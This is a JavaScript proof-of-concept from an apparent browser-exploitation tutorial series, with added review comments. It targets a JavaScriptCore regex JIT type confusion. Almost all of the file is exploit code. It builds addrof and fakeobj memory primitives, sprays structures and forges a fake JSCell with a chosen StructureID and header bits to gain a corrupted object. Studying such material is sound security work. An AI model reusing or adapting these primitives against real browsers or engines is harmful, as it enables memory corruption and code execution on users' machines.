Revisiting JavaScriptCore Internals: boxed vs. unboxed - browser 0x06
// based on: https://github.com/LinusHenze/WebKit-RegEx-Exploit
// tutorial: https://liveoverflow.com/tag/browser-exploitation/
// playlist: https://www.youtube.com/watch?v=5tEdSoZ3mmE&list=PLhixgUqwRTjwufDsT1ntgOY9yjZgg5H_t
// addrof primitive
function addrof(val) {
  // The array under test. Its only element starts out as a double literal, so
  // every read of array[0] in the warm-up loop below sees a double.
  var array = [13.37];
  // Sticky regex. Per the ECMAScript spec a sticky match reads reg.lastIndex
  // (through ToLength, which calls toString on an object) before matching;
  // that read is the hook the code relies on further down.
  var reg = /abc/y;
  // Target function: run the match, then return array[0].
  var AddrGetter = function(array) {
    //reg[Symbol.match]();
    "abc".match(reg);
    return array[0];
  }
  // Force optimization: 10000 warm-up calls, all with array[0] holding a
  // double. Why this count is enough is explained by the linked tutorial,
  // not by anything in this file.
  for (var i = 0; i < 10000; ++i)
    AddrGetter(array);
  // Setup haxx: replace lastIndex with an object whose toString swaps `val`
  // into array[0] and then yields "0". From the "abc".match(reg) call
  // onward, array[0] is therefore `val`, not a double.
  // NOTE(review): regexLastIndex is assigned without var/let, so it is an
  // implicit global shared with fakeobj(); harmless here, but a defect in
  // strict mode (ReferenceError).
  regexLastIndex = {};
  regexLastIndex.toString = function() {
    array[0] = val;
    return "0";
  };
  reg.lastIndex = regexLastIndex;
  // Do it! Returns whatever the optimized AddrGetter reads from array[0]
  // after the swap. The name says this is val's address as a double; that
  // property depends on the engine (see "boxed vs. unboxed" in the title)
  // and is not established by this file alone.
  return AddrGetter(array);
}
// fakeobj primitive
function fakeobj(dbl) {
  // Mirror of addrof(): same double-seeded array and same sticky regex, so
  // the same lastIndex/toString hook applies.
  var array = [13.37];
  var reg = /abc/y;
  // Target function: run the match, then store `dbl` into array[0].
  var AddrSetter = function(array) {
    //reg[Symbol.match]();
    "abc".match(reg);
    array[0] = dbl;
  }
  // Force optimization: 10000 warm-up calls, each storing the double `dbl`
  // into array[0] (see the tutorial link at the top for the rationale).
  for (var i = 0; i < 10000; ++i)
    AddrSetter(array);
  // Setup haxx: the toString hook now stores a plain object into array[0]
  // before the optimized store of `dbl` runs.
  // NOTE(review): regexLastIndex is again an undeclared global; see addrof().
  regexLastIndex = {};
  regexLastIndex.toString = function() {
    array[0] = {};
    return "0";
  };
  reg.lastIndex = regexLastIndex;
  // Do it! Then hand back whatever array[0] holds afterwards. The name
  // claims this is an object whose cell address is the bit pattern of `dbl`;
  // confirm against the linked writeup, this file does not show it.
  AddrSetter(array);
  return array[0];
}
// Create 0x2000 throw-away arrays, each with a fixed property `x` and a
// property whose name differs per iteration. The file does not say why;
// the tutorial presumably explains it — TODO confirm.
// NOTE(review): `test` is an undeclared global, like the other bare
// assignments below (buf, u32, f64, fake, fake_adr, hax_addr, hax).
for(var i=0; i<0x2000; i++) {
  test = []
  test.x = 1
  test['prop_'+i] = 2
}
// One 8-byte buffer viewed both as two uint32 lanes and as one float64, so a
// pair of 32-bit words can be written and read back as a single double.
// Assumes a little-endian host, so u32[0] is the low half of f64[0].
buf = new ArrayBuffer(8);
u32 = new Uint32Array(buf);
f64 = new Float64Array(buf);
// `fake` is an ordinary object whose first three properties are filled with
// hand-built doubles. The comments on the lanes are the author's intended
// meaning for each word pair; nothing here verifies the layout.
fake = {}
//fake.a = 7.082855106403439e-304
u32[0] = 0x00001000 // StructureID
u32[1] = 0x01082103 // JSCellHeader flags
fake.a = f64[0]
u32[0] = 0x41414141 // butterfly
u32[1] = 0x42424242
fake.b = f64[0]
fake.c = 1337
// Obtain the double returned by addrof(fake), adjust its low 32-bit lane
// by 0x10, and feed the result to fakeobj(). The low-lane add does not carry
// into u32[1]; fine for a small offset, wrong if the low word overflowed.
fake_adr = addrof(fake)
f64[0] = fake_adr
u32[0] += 0x10 // shift address forward by 16 bytes
hax_addr = f64[0]
hax = fakeobj(hax_addr)
// `print` is not defined in this file; presumably the JavaScript shell's
// stdout helper (browsers have no global print() that takes a value).
print(hax.length)